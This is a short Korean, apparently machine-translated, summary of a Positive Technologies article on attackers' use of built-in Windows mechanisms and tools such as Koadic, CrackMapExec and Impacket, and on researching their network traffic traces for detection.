ํ† ์ง€์—์„œ ์ƒํ™œํ•˜๋Š” ๊ฒฝํ–ฅ์ด ๋ฒ”์ฃ„์ž๋“ค ์‚ฌ์ด์—์„œ ์ธ๊ธฐ๋ฅผ ์–ป๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋“ค์€ ํ•„์š”์— ๋”ฐ๋ผ Windows์— ๋‚ด์žฅ๋œ ๋„๊ตฌ์™€ ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ด ์›์น™์„ ๋”ฐ๋ฅด๋Š” ์ธ๊ธฐ ๋„๊ตฌ์ธ Koadic, CrackMapExec ๋ฐ Impacket์ด APT ๋ณด๊ณ ์„œ์— ์ ์  ๋” ๋งŽ์ด ๋“ฑ์žฅํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋„๊ตฌ์— ๋Œ€ํ•œ GitHub์˜ ํฌํฌ ์ˆ˜๋„ ์ฆ๊ฐ€ํ•˜๊ณ  ์žˆ์œผ๋ฉฐ ์ƒˆ๋กœ์šด ํฌํฌ๊ฐ€ ๋‚˜ํƒ€๋‚˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค(ํ˜„์žฌ ์ด๋ฏธ ์•ฝ XNUMX๊ฐœ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค). ์ด ์ถ”์„ธ๋Š” ๋‹จ์ˆœ์„ฑ์œผ๋กœ ์ธํ•ด ์ธ๊ธฐ๋ฅผ ์–ป๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž์—๊ฒŒ๋Š” ํƒ€์‚ฌ ๋„๊ตฌ๊ฐ€ ํ•„์š”ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ํƒ€์‚ฌ ๋„๊ตฌ๋Š” ์ด๋ฏธ ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ์กด์žฌํ•˜๋ฉฐ ๋ณด์•ˆ ์กฐ์น˜๋ฅผ ์šฐํšŒํ•˜๋„๋ก ๋„์™€์ค๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๋Š” ๋„คํŠธ์›Œํฌ ํ†ต์‹  ์—ฐ๊ตฌ์— ์ค‘์ ์„ ๋‘๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์œ„์— ์„ค๋ช…๋œ ๊ฐ ๋„๊ตฌ๋Š” ๋„คํŠธ์›Œํฌ ํŠธ๋ž˜ํ”ฝ์— ๊ณ ์œ ํ•œ ํ”์ ์„ ๋‚จ๊น๋‹ˆ๋‹ค. ์ด์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์—ฐ๊ตฌ๋ฅผ ํ†ตํ•ด ์šฐ๋ฆฌ๋Š” ์ œํ’ˆ์„ ๊ฐ€๋ฅด์น  ์ˆ˜ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. PT ๋„คํŠธ์›Œํฌ ๊ณต๊ฒฉ ๋ฐœ๊ฒฌ ์ด๋ฅผ ํƒ์ง€ํ•˜๋ฉด ๊ถ๊ทน์ ์œผ๋กœ ์ด์™€ ๊ด€๋ จ๋œ ์ „์ฒด ์‚ฌ์ด๋ฒ„ ์‚ฌ๊ณ  ์ฒด์ธ์„ ์กฐ์‚ฌํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค.

์ €์ž:

  • Anton Tyurin, Positive Technologies์˜ PT Expert Security Center ์ „๋ฌธ ์„œ๋น„์Šค ๋ถ€์„œ ์ฑ…์ž„์ž
  • Egor Podmokov, ์ „๋ฌธ๊ฐ€, PT Expert Security Center, Positive Technologies

์ถœ์ฒ˜ : habr.com

์ฝ”๋ฉ˜ํŠธ๋ฅผ ์ถ”๊ฐ€